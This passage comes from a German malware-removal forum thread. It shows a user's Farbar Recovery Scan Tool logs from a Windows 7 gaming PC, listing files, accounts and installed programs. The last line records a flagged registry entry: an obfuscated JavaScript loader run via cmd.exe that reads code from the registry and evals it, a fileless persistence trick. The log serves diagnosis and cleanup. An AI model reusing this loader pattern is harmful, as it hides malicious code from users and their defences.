2017-07-19 01:24 - 2017-04-19 20:10 - 000549312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 000081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll
2017-07-19 00:54 - 2017-04-19 20:10 - 000001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-07-18 13:23 - 2015-03-01 21:28 - 000000000 ____D C:\ProgramData\Skype
2017-07-15 22:51 - 2017-03-31 19:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Darkest Dungeon [GOG.com]
2017-07-13 03:37 - 2017-04-19 20:10 - 008095171 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___SD C:\WINDOWS\system32\F12
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ___RD C:\Program Files\Windows Defender
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\migwiz
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\appraiser
2017-07-12 00:35 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Defender

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2017-02-10 19:24 - 2017-02-10 19:24 - 000000824 _____ () C:\Users\***\AppData\Local\recently-used.xbel
2017-08-08 17:48 - 2017-08-08 17:48 - 000000017 _____ () C:\Users\***\AppData\Local\resmon.resmoncfg
2016-11-05 23:04 - 2016-11-05 23:04 - 000000141 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\wininit.exe FEHLT <==== ACHTUNG
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert

LastRegBack: 2017-08-07 19:33

==================== Ende von FRST.txt ============================
         

Alt 09.08.2017, 18:07   #28
Lost_Viking
 

Addition



Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 09-08-2017
durchgeführt von ***** (09-08-2017 19:01:53)
Gestartet von C:\Users\*****\Desktop
Windows 7 Ultimate (X64) (2017-04-19 18:18:33)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1566530412-1856523912-1524002813-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1566530412-1856523912-1524002813-503 - Limited - Disabled)
Gast (S-1-5-21-1566530412-1856523912-1524002813-501 - Limited - Disabled)
***** (S-1-5-21-1566530412-1856523912-1524002813-1001 - Administrator - Enabled) => C:\Users\*****

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Akamai NetSession Interface (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Akamai) (Version:  - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 384.94 - NVIDIA Corporation) Hidden
ARK: Survival Evolved (HKLM\...\Steam App 346110) (Version:  - Studio Wildcard)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.16.12.0 - Asmedia Technology)
AVerMedia C353 HD Capture Device 3.3.64.53 (HKLM-x32\...\AVerMedia C353 HD Capture Device) (Version: 3.3.64.53 - AVerMedia TECHNOLOGIES, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (HKLM-x32\...\{15634701-BACE-4449-8B25-1567DA8C9FD3}) (Version: 13.51.815.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 5.32 - Piriform)
Darkest Dungeon (HKLM-x32\...\1450711444_is1) (Version: 20340 - GOG.com)
Discord (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
Dragon Age™: Inquisition (HKLM-x32\...\{DC4C36DC-4E5B-4262-B0C7-157DF534B969}) (Version: 1.0.0.12 - Electronic Arts)
Dropbox (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Dropbox) (Version: 32.4.21 - Dropbox, Inc.)
Dual-Core Optimizer (HKLM-x32\...\{9FD6F1A8-5550-46AF-8509-271DF0E768B5}) (Version: 1.1.4.0169 - AMD)
Elite Dangerous: Horizons (HKLM-x32\...\Steam App 419270) (Version:  - Frontier Developments)
Elite: Dangerous (HKLM-x32\...\Steam App 359320) (Version:  - Frontier Developments)
Endless Space (HKLM-x32\...\Steam App 208140) (Version:  - AMPLITUDE Studios)
erLT (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
EVE Online (HKLM\...\Steam App 8500) (Version:  - CCP)
Fallout 4 (HKLM-x32\...\Steam App 377160) (Version:  - Bethesda Game Studios)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Galactic Civilizations III (HKLM\...\Steam App 226860) (Version:  - Stardock Entertainment)
GameLauncherRemoval (KCD Beta Access) (HKLM-x32\...\{64189CD8-0B86-4F81-9C05-584E60386D66}) (Version: 1.0.0.0 - Warhorse Studios) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.90 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Guild Wars 2 (HKLM-x32\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.0.3.9 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.28.1006 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 13.1.0.1058 - Intel Corporation)
Intel(R) Update Manager (HKLM-x32\...\{B991A1BC-DE0F-41B3-9037-B2F948F706EC}) (Version: 3.1.1228 - Intel Corporation)
Java 8 Update 144 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
KCD Beta Access (HKLM-x32\...\{d2fb0ffd-876a-49ad-a428-fbb255d5d8d2}) (Version: 4.0 - Warhorse Studios)
KCD Beta Access (HKLM-x32\...\{FD95EDF6-7B9F-4BD1-8DAD-63D8BDD45B96}) (Version: 4.0 - Warhorse Studios) Hidden
League of Legends (HKLM-x32\...\{517CC397-B22F-4593-8DCB-DE72CC541E9A}) (Version: 3.0.1 - Riot Games ) Hidden
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
LEGO® Der Herr der Ringe™ (HKLM-x32\...\{C6F20FA7-342A-47A9-A3C8-EB36CABE6419}) (Version: 1.0.0.0 - Warner Bros. Interactive Entertainment)
Logitech Gaming Software 8.92 (HKLM\...\Logitech Gaming Software) (Version: 8.92.67 - Logitech Inc.)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Logitech Webcam-Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.80 - Logitech Inc.)
Manager (HKLM-x32\...\{2D00EBC4-DD22-4F5B-9BA1-F98ED2C6FCF2}) (Version: 5.0.15.31893 - 2017 pdfforge GmbH. All rights reserved) Hidden
Master of Orion (HKLM\...\Steam App 298050) (Version:  - NGD Studios)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft LifeCam (HKLM\...\{5CE7E3F5-9803-4F32-AA89-2D8848A80109}) (Version: 3.60.253.0 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{3c3aafc8-d898-43ec-998f-965ffdae065a}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Minion (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\{Minion}}_is1) (Version: 3.0 - Good Game Mods LLC)
Mordheim: City of the Damned (HKLM-x32\...\Steam App 276810) (Version:  - Rogue Factor)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MyPhoneExplorer (HKLM-x32\...\MPE) (Version: 1.8.8 - F.J. Wechselberger)
No Man's Sky (HKLM\...\Steam App 275850) (Version:  - Hello Games)
NVIDIA 3D Vision Controller-Treiber 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 384.94 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.8.0.89 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.8.0.89 - NVIDIA Corporation)
NVIDIA Grafiktreiber 384.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 384.94 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.27 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.27 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 355.82 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 355.82 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
NvvHci (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvvHci) (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
OLYMPUS Digital Camera Updater (HKLM-x32\...\{962428F4-2E99-4AD2-B55D-B468C18A8A89}) (Version: 2.0.0 - Olympus Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenOffice 4.1.3 (HKLM-x32\...\{8D5FCC56-BB9F-4122-923C-71753F50F6F5}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.16.25850 - Electronic Arts, Inc.)
Platform (HKLM-x32\...\{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
Qualcomm Atheros 11AC Drivers (HKLM\...\{45724D31-7270-4A0B-B236-5119CFDA42DB}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros 61x4 Bluetooth Suite (64) (HKLM\...\{628988B4-3FA5-4EA6-BAA3-DA640F6718BD}) (Version: 3.0.0.357 - Qualcomm Atheros)
Qualcomm Atheros Bandwidth Control Filter Driver (HKLM\...\{42F56083-A726-4599-A231-EF6200A39AF6}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer E220x Drivers (HKLM\...\{1CC47E9F-A34A-44B3-8C5A-D45C1A3CB94C}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Qualcomm Atheros Killer Performance Suite (HKLM-x32\...\{E70DB50B-10B4-46BC-9DE2-AB8B49E061EE}) (Version: 1.1.47.1058 - Qualcomm Atheros)
Qualcomm Atheros Network Manager (HKLM\...\{A32F7F52-0DC5-40EF-84BD-7D30CC20D157}) (Version: 1.1.47.1058 - Qualcomm Atheros) Hidden
Rayman Origins (HKLM-x32\...\Uplay Install 80) (Version:  - Ubisoft)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.3 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.3 - VS Revo Group, Ltd.)
Rise of the Tomb Raider (HKLM\...\Steam App 391220) (Version:  - Crystal Dynamics)
Samsung Kies (HKLM-x32\...\{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.) Hidden
Samsung Kies (HKLM-x32\...\InstallShield_{758C8301-2696-4855-AF45-534B1200980A}) (Version: 2.6.4.16113.3 - Samsung Electronics Co., Ltd.)
Samsung USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.61.0 - Samsung Electronics Co., Ltd.)
SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 4.0.98.0213 - Electronic Arts)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype Web Plugin (HKLM-x32\...\{E8A70371-2C4D-4B12-831D-6A4BB9AC7AEF}) (Version: 7.29.0.73 - Skype Technologies S.A.)
Skype™ 7.38 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.38.101 - Skype Technologies S.A.)
Smart Switch (HKLM-x32\...\{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.) Hidden
Smart Switch (HKLM-x32\...\InstallShield_{74FA5314-85C8-4E2A-907D-D9ECCCB770A7}) (Version: 4.1.17054.16 - Samsung Electronics Co., Ltd.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{C9193CBB-C31A-412A-A074-AD08F0F2CF3D}) (Version: 7.0.27.13 - Mad Catz)
Smite (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF017}) (Version: 4.14.4229.4 - Hi-Rez Studios)
Spotify (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Spotify) (Version: 1.0.53.758.gde3fc4b2 - Spotify AB)
Star Citizen Launcher (HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\Star Citizen Launcher) (Version: 00.01.00.00 - Cloud Imperium Games)
STAR WARS™ Battlefront™ (HKLM-x32\...\{E402D891-4E45-4ce9-B41F-DD35864EF170}) (Version: 1.0.7.64833 - Electronic Arts)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Steuer St.Gallen 2016 nP 1.6.0 (HKLM-x32\...\0222-4883-7289-1667) (Version: 1.6.0 - Information Factory AG)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Terraria (HKLM-x32\...\Steam App 105600) (Version:  - Re-Logic)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Long Dark (HKLM\...\Steam App 305620) (Version:  - Hinterland Studio Inc.)
The Witcher 3 - Wild Hunt (HKLM-x32\...\1207664643_is1) (Version: 1.31.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Blood and Wine (HKLM-x32\...\Blood and Wine_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Free DLC program (16 DLC) (HKLM-x32\...\Free DLC program (16 DLC)_is1) (Version: 1.24.0.0 - GOG.com)
The Witcher 3: Wild Hunt - Hearts of Stone (HKLM-x32\...\Hearts of Stone_is1) (Version: 1.24.0.0 - GOG.com)
Tom Clancy's The Division (HKLM\...\Steam App 365590) (Version:  - Massive Entertainment)
TomTom MyDrive Connect 4.1.6.3229 (HKLM-x32\...\MyDriveConnect) (Version: 4.1.6.3229 - TomTom)
Total War™: WARHAMMER® (HKLM\...\Steam App 364360) (Version:  - Creative Assembly)
Tyranny (HKLM\...\Steam App 362960) (Version:  - Obsidian Entertainment)
Uplay (HKLM-x32\...\Uplay) (Version: 5.1 - Ubisoft)
VIA Plattform-Geräte-Manager (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.42 - VIA Technologies, Inc.)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
VoiceAttack (HKLM-x32\...\{75E13F4F-139E-4CCA-A5A5-7476E4C5484D}) (Version: 1.4 - VoiceAttack.com)
Vulkan Run Time Libraries 1.0.3.0 (HKLM\...\VulkanRT1.0.3.0) (Version: 1.0.3.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Warframe (HKLM-x32\...\{EE130AB8-143A-4AA2-B81A-79EC1623C899}) (Version: 1.0.0 - Digital Extremes)
Warhammer 40,000: Dawn of War III (HKLM\...\Steam App 285190) (Version:  - Relic Entertainment)
Warhammer: End Times - Vermintide (HKLM\...\Steam App 235540) (Version:  - Fatshark)
WestwoodOnline (HKLM-x32\...\{BBCD6D56-8A26-4DDE-9482-DBC9C7B7341D}) (Version:  - )
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
Wolfenstein: The New Order German Edition (HKLM-x32\...\Steam App 288570) (Version:  - MachineGames)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{144DF3B2-2402-47AE-9583-5A045929A8D4}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{A03A51A2-5B59-4ECE-96D1-037F7F2A0D8F}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\*****\AppData\Local\Google\Update\1.3.33.5\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\*****\AppData\Roaming\Dropbox\bin\DropboxExt64.18.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001_Classes\CLSID\{FE0A3EA9-4DDA-4B0A-9981-5ABE8F0186CD}\InprocServer32 -> C:\Users\*****\AppData\Local\SkypePlugin\7.29.0.73\GatewayActiveX-x64.dll (Skype Technologies S.A.)
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Software\Classes\uwas: cmd.exe /c start "" "C:\Users\*****\AppData\Local\Wqy He\xfoqedfutx.hnen" "javascript:np5aj="n";j6Q0=new ActiveXObject("WScript.Shell");CJH0m="XMmT";Ku05Ci=j6Q0.RegRead("HKCU\\software\\lyndd\\jupmxfqiju");JQo0Sr="6SpeO0";eval(Ku05Ci);dYlGfd3="bB6tEkG";" <==== ACHTUNG
